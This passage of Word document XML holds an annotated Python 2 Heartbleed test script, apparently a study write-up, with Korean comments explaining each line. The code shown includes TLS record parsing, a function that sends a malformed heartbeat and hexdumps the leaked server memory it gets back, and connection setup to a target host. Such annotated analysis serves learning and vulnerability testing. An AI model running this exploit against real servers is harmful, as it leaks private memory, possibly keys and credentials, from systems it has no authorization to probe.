            <w:r w:rsidRPr="00F37C5F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  # </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F37C5F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recvall</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F37C5F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</w:t>
            </w:r>
            <w:r w:rsidRPr="00F37C5F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함수에 소켓과 길이를 입력하여 얻은 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F37C5F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반환값을</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F37C5F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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F37C5F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hdr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F37C5F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변수에 저장</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39C83D93" w14:textId="1F80B97B" w:rsid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hdr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recvall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s, 5)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="285857C3" w14:textId="092C34A8" w:rsidR="00854462" w:rsidRPr="00854462" w:rsidRDefault="00854462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 w:rsidRPr="00854462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</w:t>
            </w:r>
            <w:r w:rsidRPr="00854462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  # </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00854462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EOF :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00854462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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00854462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hdr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00854462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이 </w:t>
            </w:r>
            <w:r w:rsidRPr="00854462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None </w:t>
            </w:r>
            <w:r w:rsidRPr="00854462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이라면 에러메시지를 출력하고 </w:t>
            </w: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함수를 종료하며 </w:t>
            </w:r>
            <w:r w:rsidRPr="00854462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None </w:t>
            </w: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반환</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51EF0FA3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if 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hdr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is None:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B37B4E2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    print 'Unexpected EOF receiving record header - server closed connection'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="032325AF" w14:textId="287F5D49" w:rsid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    return None, None, None</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="392A7397" w14:textId="0CE90CCA" w:rsidR="00854462" w:rsidRDefault="00854462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>
              <w:rPr>
                <w:rFonts w:ascii="굴림체" w:eastAsia="굴림체" w:hAnsi="굴림체" w:cs="굴림체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854462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  # </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00854462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typ</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00854462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854462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ver</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00854462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, ln </w:t>
            </w:r>
            <w:r w:rsidRPr="00854462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변수에 </w:t>
            </w:r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&gt;BHH </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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포멧에</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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따른 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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hdr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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버퍼를 언 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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패킹하여</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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나온 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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튜플</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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값 저장</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="639C4F2A" w14:textId="264746B7" w:rsidR="00854462" w:rsidRPr="00854462" w:rsidRDefault="00854462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  # &gt;</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/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BHH :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76696D68" w14:textId="7843FF87" w:rsid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typ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ver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, ln = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gram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struct.unpack</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gram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('&gt;BHH', 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hdr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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63AEE1FD" w14:textId="538E19E8" w:rsidR="00854462" w:rsidRPr="00854462" w:rsidRDefault="00854462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 w:rsidRPr="00854462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</w:t>
            </w:r>
            <w:r w:rsidRPr="00854462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  # </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00854462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recvall</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00854462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</w:t>
            </w:r>
            <w:r w:rsidRPr="00854462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함수에 소켓과 길이,</w:t>
            </w:r>
            <w:r w:rsidRPr="00854462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timeout</w:t>
            </w:r>
            <w:r w:rsidRPr="00854462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=</w:t>
            </w:r>
            <w:r w:rsidRPr="00854462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10 </w:t>
            </w:r>
            <w:r w:rsidRPr="00854462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값을 입력하여 얻은 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00854462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반환값을</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00854462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</w:t>
            </w:r>
            <w:r w:rsidRPr="00854462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pay</w:t>
            </w:r>
            <w:r w:rsidRPr="00854462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에 저장</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45972FE3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pay = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gram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recvall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s, ln, 10)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="764A6DD5" w14:textId="5476A160" w:rsidR="001F6E1C" w:rsidRPr="001F6E1C" w:rsidRDefault="001F6E1C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 w:rsidRPr="001F6E1C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</w:t>
            </w:r>
            <w:r w:rsidRPr="001F6E1C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  # pay </w:t>
            </w:r>
            <w:r w:rsidRPr="001F6E1C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값이 </w:t>
            </w:r>
            <w:r w:rsidRPr="001F6E1C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None</w:t>
            </w:r>
            <w:r w:rsidRPr="001F6E1C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이라면 에러메시지 출력 후 </w:t>
            </w:r>
            <w:r w:rsidRPr="001F6E1C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None </w:t>
            </w:r>
            <w:r w:rsidRPr="001F6E1C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반환</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5414E0AB" w14:textId="0CCED83E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if pay is None:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FFBEBB8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    print 'Unexpected EOF receiving record payload - server closed connection'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E8EC564" w14:textId="3238417A" w:rsid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    return None, None, None</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3334C36E" w14:textId="50D56471" w:rsidR="00B26176" w:rsidRPr="00B26176" w:rsidRDefault="00B26176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 w:rsidRPr="00B26176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lastRenderedPageBreak/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00B26176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  # </w:t>
            </w:r>
            <w:r w:rsidRPr="00B26176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다음 변수들을 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B26176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포멧에</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B26176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따라 출력</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0637551D" w14:textId="45A70EBF" w:rsid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print ' ... received message: type = %d, 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ver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= %04x, length = %d' % (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typ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ver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len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pay))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34ED8BA1" w14:textId="3B19EB64" w:rsidR="00B26176" w:rsidRPr="00B26176" w:rsidRDefault="00B26176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 w:rsidRPr="00B26176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</w:t>
            </w:r>
            <w:r w:rsidRPr="00B26176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  # </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B26176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typ</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B26176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B26176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ver</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B26176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, pay </w:t>
            </w:r>
            <w:r w:rsidRPr="00B26176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값 반환</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13C8ED77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return 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typ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ver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 pay</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E4A9CFD" w14:textId="16C71641" w:rsid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</w:p>
          <w:p w14:paraId="6EAD7B13" w14:textId="2F084741" w:rsidR="005209BC" w:rsidRPr="005209BC" w:rsidRDefault="005209BC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 w:hint="eastAsia"/>
                <w:color w:val="0070C0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005209BC">
              <w:rPr>
                <w:rFonts w:ascii="굴림체" w:eastAsia="굴림체" w:hAnsi="굴림체" w:cs="굴림체" w:hint="eastAsia"/>
                <w:color w:val="0070C0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r w:rsidRPr="005209BC">
              <w:rPr>
                <w:rFonts w:ascii="굴림체" w:eastAsia="굴림체" w:hAnsi="굴림체" w:cs="굴림체"/>
                <w:color w:val="0070C0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005209BC">
              <w:rPr>
                <w:rFonts w:ascii="굴림체" w:eastAsia="굴림체" w:hAnsi="굴림체" w:cs="굴림체" w:hint="eastAsia"/>
                <w:color w:val="0070C0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">다른 함수로부터 받은 정보를 이용하여 </w:t>
            </w:r>
            <w:r w:rsidRPr="005209BC">
              <w:rPr>
                <w:rFonts w:ascii="굴림체" w:eastAsia="굴림체" w:hAnsi="굴림체" w:cs="굴림체"/>
                <w:color w:val="0070C0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">heartbeat </w:t>
            </w:r>
            <w:r w:rsidRPr="005209BC">
              <w:rPr>
                <w:rFonts w:ascii="굴림체" w:eastAsia="굴림체" w:hAnsi="굴림체" w:cs="굴림체" w:hint="eastAsia"/>
                <w:color w:val="0070C0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>취약점을 판단하는 함수</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F755693" w14:textId="6C6836F7" w:rsid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def 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hit_hb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s):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75118130" w14:textId="5CA11620" w:rsidR="00B26176" w:rsidRPr="00B26176" w:rsidRDefault="00B26176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 w:rsidRPr="00B26176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</w:t>
            </w:r>
            <w:r w:rsidRPr="00B26176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  # </w:t>
            </w:r>
            <w:r w:rsidRPr="00B26176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연결된 소켓에</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B26176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hb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B26176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</w:t>
            </w:r>
            <w:r w:rsidRPr="00B26176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값을 전달한다</w:t>
            </w:r>
            <w:r w:rsidR="00B843FE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.</w:t>
            </w:r>
            <w:r w:rsidR="00B843FE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</w:t>
            </w:r>
            <w:r w:rsidR="00B843FE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즉 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00B843FE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heartbleed</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00B843FE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</w:t>
            </w:r>
            <w:r w:rsidR="00B843FE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취약점을 공략하는 패킷을 보냄</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="438715E0" w14:textId="295A4C87" w:rsid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s.send</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gram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hb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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08368DE5" w14:textId="195C897C" w:rsidR="00B26176" w:rsidRPr="00B26176" w:rsidRDefault="00B26176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 w:rsidRPr="00B26176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</w:t>
            </w:r>
            <w:r w:rsidRPr="00B26176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  # </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B26176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반복문</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B26176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시작</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="305F0F5D" w14:textId="0E1317CB" w:rsid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while True:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D8484A4" w14:textId="3F14C21F" w:rsidR="00B26176" w:rsidRPr="00B26176" w:rsidRDefault="00B26176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 w:rsidRPr="00B26176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</w:t>
            </w:r>
            <w:r w:rsidRPr="00B26176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      # </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B26176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recvmsg</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B26176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함수에 소켓을 전달하고 받은 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B26176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반환값을</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B26176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26176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typ</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B26176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B26176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ver</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B26176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, pay</w:t>
            </w:r>
            <w:r w:rsidRPr="00B26176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변수에 저장</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49DD2638" w14:textId="1A67E4CC" w:rsid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typ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ver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, pay = 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recvmsg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s)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EC12F2B" w14:textId="656883D0" w:rsidR="00B26176" w:rsidRPr="00B26176" w:rsidRDefault="00B26176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 w:rsidRPr="00B26176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</w:t>
            </w:r>
            <w:r w:rsidRPr="00B26176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      # </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B26176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typ</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B26176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이 </w:t>
            </w:r>
            <w:r w:rsidRPr="00B26176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None</w:t>
            </w:r>
            <w:r w:rsidRPr="00B26176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이라면 </w:t>
            </w:r>
            <w:r w:rsidRPr="00B26176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heartbeat </w:t>
            </w:r>
            <w:r w:rsidRPr="00B26176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취약점이 없는 것으로 판단 후 </w:t>
            </w:r>
            <w:r w:rsidRPr="00B26176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False </w:t>
            </w:r>
            <w:r w:rsidRPr="00B26176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반환</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44101E77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    if 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typ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is None:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="396D9931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        print 'No heartbeat response </w:t>
            </w:r>
            <w:proofErr w:type="gram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received,</w:t>
            </w:r>
            <w:proofErr w:type="gram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server likely not vulnerable'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C9ABE19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        return False</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="177BA1FF" w14:textId="7595C0F7" w:rsid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</w:p>
          <w:p w14:paraId="0D18ADFB" w14:textId="6F9B41E3" w:rsidR="00B26176" w:rsidRPr="00B26176" w:rsidRDefault="00B26176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 w:rsidRPr="00B26176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</w:t>
            </w:r>
            <w:r w:rsidRPr="00B26176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      # </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B26176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typ</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B26176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이 </w:t>
            </w:r>
            <w:r w:rsidRPr="00B26176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24</w:t>
            </w:r>
            <w:r w:rsidRPr="00B26176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라면 </w:t>
            </w:r>
            <w:r w:rsidRPr="00B26176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heartbeat </w:t>
            </w:r>
            <w:r w:rsidRPr="00B26176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취약점이 있는 것이며,</w:t>
            </w:r>
            <w:r w:rsidRPr="00B26176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</w:t>
            </w:r>
            <w:r w:rsidRPr="00B26176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결과 값을 받아온다</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D02701A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    if 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typ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== 24:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="619385B0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        print 'Received heartbeat response:'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32D8C456" w14:textId="25B64FCD" w:rsidR="00B26176" w:rsidRPr="00B26176" w:rsidRDefault="00B26176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 w:rsidRPr="00B26176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</w:t>
            </w:r>
            <w:r w:rsidRPr="00B26176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          # </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B26176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hexdump</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B26176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</w:t>
            </w:r>
            <w:r w:rsidRPr="00B26176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함수에 </w:t>
            </w:r>
            <w:r w:rsidRPr="00B26176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pay </w:t>
            </w:r>
            <w:r w:rsidRPr="00B26176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변수 입력</w:t>
            </w:r>
            <w:r w:rsidR="00B843FE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하여 호출.</w:t>
            </w:r>
            <w:r w:rsidR="00B843FE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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="737C8EAC" w14:textId="48C32225" w:rsid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        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hexdump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pay)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0101BCBD" w14:textId="2D313CA5" w:rsidR="00B26176" w:rsidRPr="00B26176" w:rsidRDefault="00B26176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 w:rsidRPr="00B26176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</w:t>
            </w:r>
            <w:r w:rsidRPr="00B26176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          # pay </w:t>
            </w:r>
            <w:r w:rsidRPr="00B26176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변수의 길이가 </w:t>
            </w:r>
            <w:r w:rsidRPr="00B26176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3 </w:t>
            </w:r>
            <w:r w:rsidRPr="00B26176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이상이라면 서버가 비정상적으로 많은 데이터 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B26176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반환</w:t>
            </w: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중</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="0C7A3F3E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        if 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len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pay) &gt; 3:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48D8F096" w14:textId="54F045B9" w:rsid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            print 'WARNING: server returned more data than it should - server is vulnerable!'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20AFB249" w14:textId="4552A485" w:rsidR="00B26176" w:rsidRPr="00B26176" w:rsidRDefault="00B26176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 w:rsidRPr="00B26176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</w:t>
            </w:r>
            <w:r w:rsidRPr="00B26176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          # pay </w:t>
            </w:r>
            <w:r w:rsidRPr="00B26176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변수의 길이가 </w:t>
            </w:r>
            <w:r w:rsidRPr="00B26176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3 </w:t>
            </w:r>
            <w:r w:rsidRPr="00B26176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미만이라면 서버가 추가적인 데이터를 반환하지 않음</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="459273C6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        else:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E703F22" w14:textId="0E7E5BA2" w:rsid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            print 'Server processed malformed heartbeat, but did not return any extra data.'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="208E1D1C" w14:textId="51784BAE" w:rsidR="00B26176" w:rsidRPr="00B26176" w:rsidRDefault="00B26176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 w:rsidRPr="00B26176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</w:t>
            </w:r>
            <w:r w:rsidRPr="00B26176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          # True </w:t>
            </w:r>
            <w:r w:rsidRPr="00B26176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반환</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5332CAC6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        return True</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E99FC73" w14:textId="58C2549F" w:rsidR="008A727E" w:rsidRPr="00B26176" w:rsidRDefault="00B26176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 w:rsidRPr="00B26176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</w:t>
            </w:r>
            <w:r w:rsidRPr="00B26176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      # </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B26176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typ</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B26176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가 </w:t>
            </w:r>
            <w:r w:rsidRPr="00B26176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21</w:t>
            </w:r>
            <w:r w:rsidRPr="00B26176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이라면 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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hexdump</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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함수를 실행시킨 뒤 서버가 취약하지 않다고 출력</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F17C16E" w14:textId="2C8C8D29" w:rsidR="00B26176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    if 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typ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== 21:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65AD215F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        print 'Received alert:'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DE62269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        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hexdump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pay)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40C2FB5F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        print 'Server returned error, likely not vulnerable'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13325490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        return False</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CE2E51E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</w:p>
          <w:p w14:paraId="777C6A57" w14:textId="732418B3" w:rsid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def </w:t>
            </w:r>
            <w:proofErr w:type="gram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main(</w:t>
            </w:r>
            <w:proofErr w:type="gram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:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AD492F2" w14:textId="515ACE3E" w:rsidR="0011429B" w:rsidRPr="0011429B" w:rsidRDefault="0011429B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</w:pPr>
            <w:r w:rsidRPr="0011429B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</w:t>
            </w:r>
            <w:r w:rsidRPr="0011429B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  # </w:t>
            </w:r>
            <w:r w:rsidR="009A3B23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p</w:t>
            </w:r>
            <w:r w:rsidR="009A3B23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arsing </w:t>
            </w:r>
            <w:r w:rsidR="009A3B23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한 옵션값들을</w:t>
            </w:r>
            <w:r w:rsidR="004A653B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</w:t>
            </w:r>
            <w:r w:rsidR="004A653B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opts, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="004A653B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args</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="004A653B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에 넣어준다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B087F84" w14:textId="097E032D" w:rsid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opts, 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args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options.parse</w:t>
            </w:r>
            <w:proofErr w:type="gram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_args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)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="424C99E8" w14:textId="25E4BAFD" w:rsidR="00416CBB" w:rsidRPr="00416CBB" w:rsidRDefault="00416CBB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</w:pPr>
            <w:r w:rsidRPr="00416CBB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</w:t>
            </w:r>
            <w:r w:rsidRPr="00416CBB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  # </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00416CBB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args</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00416CBB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의 길이가 </w:t>
            </w:r>
            <w:r w:rsidRPr="00416CBB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1</w:t>
            </w:r>
            <w:r w:rsidRPr="00416CBB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이하라면</w:t>
            </w:r>
            <w:r w:rsidR="005209BC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,</w:t>
            </w:r>
            <w:r w:rsidR="005209BC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</w:t>
            </w:r>
            <w:r w:rsidR="005209BC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즉 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="005209BC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입력값이</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="005209BC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단어 </w:t>
            </w:r>
            <w:r w:rsidR="005209BC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1</w:t>
            </w:r>
            <w:r w:rsidR="005209BC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개 이하라면</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1010EB29" w14:textId="1669E021" w:rsid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if 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len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args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 &lt; 1:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76C8101A" w14:textId="45BDA09A" w:rsidR="005209BC" w:rsidRPr="005209BC" w:rsidRDefault="005209BC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</w:pPr>
            <w:r w:rsidRPr="005209BC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</w:t>
            </w:r>
            <w:r w:rsidRPr="005209BC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      # options </w:t>
            </w:r>
            <w:r w:rsidRPr="005209BC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개체로부터 </w:t>
            </w:r>
            <w:r w:rsidRPr="005209BC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help </w:t>
            </w:r>
            <w:r w:rsidRPr="005209BC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개체를 가져와서 출력한다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="741A2F46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options.print_</w:t>
            </w:r>
            <w:proofErr w:type="gram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help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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B949727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    return</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E777D6B" w14:textId="0F694185" w:rsidR="008A727E" w:rsidRPr="00F37C5F" w:rsidRDefault="00F05598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 w:rsidRPr="00F37C5F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lastRenderedPageBreak/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F37C5F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  # </w:t>
            </w:r>
            <w:r w:rsidRPr="00F37C5F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소켓을 만들어 </w:t>
            </w:r>
            <w:r w:rsidRPr="00F37C5F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s</w:t>
            </w:r>
            <w:r w:rsidRPr="00F37C5F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에 저장한다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4913724C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s = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gram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socket.socket</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gram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socket.AF_INET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socket.SOCK_STREAM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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A14B457" w14:textId="55BDB4BF" w:rsid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print 'Connecting...'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69CBF606" w14:textId="72F1CAD9" w:rsidR="008624A9" w:rsidRPr="00D21FFD" w:rsidRDefault="008624A9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</w:t>
            </w:r>
            <w:r w:rsidR="00D21FFD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</w:t>
            </w:r>
            <w:r w:rsidR="00D21FFD" w:rsidRPr="008624A9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# </w:t>
            </w:r>
            <w:r w:rsidR="00D21FFD" w:rsidRPr="008624A9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버퍼에 있는 내용을 바로 출력시킨다</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57572234" w14:textId="2377B9F8" w:rsid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sys.stdout</w:t>
            </w:r>
            <w:proofErr w:type="gram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.flush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)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43261A5D" w14:textId="553C9F8F" w:rsidR="008624A9" w:rsidRPr="008624A9" w:rsidRDefault="008624A9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 w:rsidRPr="008624A9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</w:t>
            </w:r>
            <w:r w:rsidRPr="008624A9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  # connect </w:t>
            </w:r>
            <w:r w:rsidRPr="008624A9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함수로 첫 번째 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008624A9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입력값</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008624A9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(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008624A9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ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008624A9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), </w:t>
            </w:r>
            <w:r w:rsidRPr="008624A9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두 번째 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008624A9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입력값</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008624A9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(포트번호)</w:t>
            </w:r>
            <w:r w:rsidRPr="008624A9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</w:t>
            </w:r>
            <w:r w:rsidRPr="008624A9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로 접속한다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44C8125C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s.connect</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gram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(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args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[0], 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opts.port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)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A753BB9" w14:textId="11C22398" w:rsid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print 'Sending Client Hello...'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FDC2E3F" w14:textId="00ABB2E5" w:rsidR="008624A9" w:rsidRPr="008624A9" w:rsidRDefault="008624A9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 w:rsidRPr="008624A9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</w:t>
            </w:r>
            <w:r w:rsidRPr="008624A9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  # </w:t>
            </w:r>
            <w:r w:rsidRPr="008624A9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버퍼에 있는 내용을 바로 출력시킨다</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E80FC0E" w14:textId="4A2584E2" w:rsid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sys.stdout</w:t>
            </w:r>
            <w:proofErr w:type="gram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.flush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)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C67BD07" w14:textId="0968BE25" w:rsidR="008624A9" w:rsidRPr="001F6E1C" w:rsidRDefault="008624A9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 w:rsidRPr="001F6E1C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</w:t>
            </w:r>
            <w:r w:rsidRPr="001F6E1C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  # </w:t>
            </w:r>
            <w:r w:rsidR="001F6E1C" w:rsidRPr="001F6E1C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연결된 소켓에 </w:t>
            </w:r>
            <w:r w:rsidR="000E0C49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처음에 제작한 </w:t>
            </w:r>
            <w:r w:rsidR="001F6E1C" w:rsidRPr="001F6E1C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hello </w:t>
            </w:r>
            <w:r w:rsidR="000E0C49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데이터(패킷)를</w:t>
            </w:r>
            <w:r w:rsidR="001F6E1C" w:rsidRPr="001F6E1C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보낸다</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05526262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s.send</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gram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hello)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4494ED0B" w14:textId="48E7BB97" w:rsid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print 'Waiting for Server Hello...'</w:t>
            </w:r>
          </w:p>
